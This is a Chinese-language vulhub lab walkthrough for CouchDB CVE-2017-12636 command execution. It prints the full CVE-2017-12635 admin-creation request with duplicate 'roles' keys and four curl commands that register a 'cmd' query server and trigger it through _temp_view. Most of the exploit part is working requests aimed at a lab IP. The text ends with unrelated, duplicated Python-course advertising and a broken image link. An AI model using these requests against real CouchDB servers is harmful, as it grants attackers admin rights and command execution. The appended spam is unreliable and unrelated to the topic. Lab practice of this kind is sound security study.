环境准备
Couchdb 2.x和1.x的API接口有一定的区别,所以这个漏洞的利用方式也不同。本环境启动是1.6.0版本,如果你想测试2.1.0版本,可以启动CVE-2017- 12635附带的环境。
靶机环境 139.196.87.102 (vulhub)
攻击机环境 192.168.8.137 (虚拟机 Ubuntu 20、Java1.8、Burp)
启动 Couchdb 垂直权限绕过漏洞 环境
1.进入 vulhub 的 Couchdb 任意命令执行漏洞 路径
cd /usr/local/tools/vulhub/couchdb/CVE-2017-12636
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep vulhub
启动完成后,访问http://139.196.87.102:5984/浏览Couchdb的欢迎页面。
漏洞检测
漏洞检测
开发或运维人员检查是否使用了受影响版本范围内的Apache CouchDB,是否配置了强口令和网络访问控制策略。
漏洞利用
该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用 CVE-2017-12635 先增加一个管理员用户。
增加管理用户的数据包如下
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 139.196.87.102:5984
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108
{
“type”: “user”,
“name”: “vulhub”,
“roles”: [“_admin”],
“roles”: [],
“password”: “vulhub”
}
1.7.0 以下的说明
依次执行如下请求即可触发任意命令执行:
curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/_config/query_servers/cmd’ -d ‘“id >/tmp/success”’
curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/vultest’
curl -X PUT ‘http://vulhub:vulhub@139.196.87.102:5984/vultest/vul’ -d ‘{“_id”:“770895a97726d5ca6d70a22173005c7b”}’
curl -X POST ‘http://vulhub:vulhub@139.196.87.102:5984/vultest/_temp_view?limit=10’ -d ‘{“language”:“cmd”,“map”:“”}’ -H ‘Content-Type:application/json’
其中,vulhub:vulhub为管理员账号密码。
第一个请求是添加一个名字为cmd的query_servers,其值为"id >/tmp/success",这就是我们要执行的命令。
第二、三个请求是添加一个数据库和文档,这里添加了一个可以查询的。
第四个请求在这个数据库里进行,因为我将其设置为cmd,这里就是我最初cmd的开始添加的命名的query_servers最后触发命令执行。
验证漏洞利用是否成功
进入容器查看 /tmp/ 路径下 是否生成 success 文件
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数Python工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年Python开发全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上前端开发知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以扫码获取!!!(备注Python)
mg.cn/img_convert/9f49b566129f47b8a67243c1008edf79.png)
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上前端开发知识点,真正体系化!
由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新
如果你觉得这些内容对你有帮助,可以扫码获取!!!(备注Python)